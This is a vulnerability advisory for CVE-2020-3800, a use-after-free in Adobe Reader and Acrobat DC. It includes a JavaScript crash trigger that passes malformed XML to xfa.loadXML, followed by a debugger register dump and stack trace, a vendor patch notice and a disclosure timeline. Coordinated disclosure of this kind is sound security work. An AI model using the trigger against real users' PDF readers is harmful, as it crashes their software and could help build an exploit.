Advisories

Adobe Reader xfa.loadXML Use-after-Free

CVE ID

CVE-2020-3800

Tested Versions

  • Acrobat DC version 2019.008.20064 (Windows 10 64-bit)

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF).

Both Adobe Reader and Acrobat DC share the same AcroForm.api plugin: File Version 19.012.20040.17853

Vulnerability

Adobe Reader and Adobe Acrobat DC crashes after executing the following Javascript code:

xfa.loadXML('<document>\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\n<![CDATA[\n</document>')

The malformed XML data causes a use-after-free to occur. While there are there are many indirect calls following this that can be used to control EIP, many combinations of XML data and Javascript code was tested but was unable to re-allocated back into the freed object hence the impact of this vulnerability might be low.

The crash stack trace is as follows:

This exception may be expected and handled.
eax=007cc0e8 ebx=36dd1fb0 ecx=53549f5a edx=07600000 esi=007cc438 edi=64ba0fb0
eip=53109ce2 esp=007cc10c ebp=007cc138 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
AcroForm!PlugInMain+0x299f2:
53109ce2 8b4728          mov     eax,dword ptr [edi+28h] ds:002b:64ba0fd8=????????
0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 007cc138 53109b57 AcroForm!PlugInMain+0x299f2
01 007cc168 579e4fac AcroForm!PlugInMain+0x29867
02 007cc1ac 579e5a44 AXE8SharedExpat!AXE8_ExpatTerminate+0x329c
03 007cc230 579e4c8d AXE8SharedExpat!AXE8_ExpatTerminate+0x3d34
04 007cc25c 579e7616 AXE8SharedExpat!AXE8_ExpatTerminate+0x2f7d
05 007cc2b0 579ea0bb AXE8SharedExpat!AXE8_ExpatTerminate+0x5906
06 007cc2fc 579ea04b AXE8SharedExpat!AXE8_ExpatTerminate+0x83ab
07 007cc318 579e3bb3 AXE8SharedExpat!AXE8_ExpatTerminate+0x833b
08 007cc340 531051ec AXE8SharedExpat!AXE8_ExpatTerminate+0x1ea3
09 007cc3e8 5310487a AcroForm!PlugInMain+0x24efc
0a 007cc404 53100f71 AcroForm!PlugInMain+0x2458a
0b 007cc408 53150328 AcroForm!PlugInMain+0x20c81
0c 007cc420 53150342 AcroForm!PlugInMain+0x70038
0d 007cc4f4 531502be AcroForm!PlugInMain+0x70052
0e 007cc560 536e093d AcroForm!PlugInMain+0x6ffce
0f 007cc620 536e4728 AcroForm!DllUnregisterServer+0x3df9ed
10 007cc72c 534be9ce AcroForm!DllUnregisterServer+0x3e37d8
11 007cc988 520c4cd5 AcroForm!DllUnregisterServer+0x1bda7e
12 007ccad0 520a8588 EScript!mozilla::HashBytes+0x44295
13 007ccb44 520a2fdf EScript!mozilla::HashBytes+0x27b48
14 007ccff0 520a1e6e EScript!mozilla::HashBytes+0x2259f
15 007cd03c 520a1d7e EScript!mozilla::HashBytes+0x2142e
16 007cd078 520a1cb3 EScript!mozilla::HashBytes+0x2133e
17 007cd0ac 5208a32c EScript!mozilla::HashBytes+0x21273
18 007cd0fc 520cbc09 EScript!mozilla::HashBytes+0x98ec
19 007cd180 520cb8c4 EScript!mozilla::HashBytes+0x4b1c9
1a 007cd334 520cb48c EScript!mozilla::HashBytes+0x4ae84
1b 007cd380 520ca2b7 EScript!mozilla::HashBytes+0x4aa4c
1c 007cd418 521493ef EScript!mozilla::HashBytes+0x49877
1d 007cd478 790b82f7 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x6e5bf
1e 007cd508 790b3d13 AcroRd32!AIDE::PixelPartInfo::operator=+0x30e77
1f 007cd558 78e66bb2 AcroRd32!AIDE::PixelPartInfo::operator=+0x2c893
20 007cd588 78e6712a AcroRd32!AX_PDXlateToHostEx+0x229782
21 007cd5e0 790b7f17 AcroRd32!AX_PDXlateToHostEx+0x229cfa
22 007cd6b8 78a59348 AcroRd32!AIDE::PixelPartInfo::operator=+0x30a97
23 007cd704 78a27d17 AcroRd32!DllCanUnloadNow+0x130478
24 007cd758 789827bd AcroRd32!DllCanUnloadNow+0xfee47
25 007cd7e4 78981b59 AcroRd32!DllCanUnloadNow+0x598ed
26 007cd944 7896ce70 AcroRd32!DllCanUnloadNow+0x58c89
27 007cd9c4 7896c676 AcroRd32!DllCanUnloadNow+0x43fa0
28 007cdabc 7896c1d0 AcroRd32!DllCanUnloadNow+0x437a6
29 007cdaf0 78967f0a AcroRd32!DllCanUnloadNow+0x43300
2a 007cdca4 78965d97 AcroRd32!DllCanUnloadNow+0x3f03a
2b 007ce590 7896557e AcroRd32!DllCanUnloadNow+0x3cec7
2c 007ce5b4 78c35693 AcroRd32!DllCanUnloadNow+0x3c6ae
2d 007ce5cc 78cf7392 AcroRd32!AXSetInitViaPDFL+0x7543
2e 007ce628 78cf7f20 AcroRd32!AX_PDXlateToHostEx+0xb9f62
2f 007ce680 78d469f0 AcroRd32!AX_PDXlateToHostEx+0xbaaf0
30 007ce6e0 75fc0ed2 AcroRd32!AX_PDXlateToHostEx+0x1095c0
31 007ce720 7623f4c4 ole32!CPrivDragDrop::PrivDragDrop+0x172 [com\ole32\com\rot\getif.cxx @ 739] 
32 007ce764 76204f3d RPCRT4!Invoke+0x34

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB20-13.

Timeline

  • 2020-02-04 Vendor disclosure
  • 2020-03-17 Vendor patched

Credit

Discovered by bit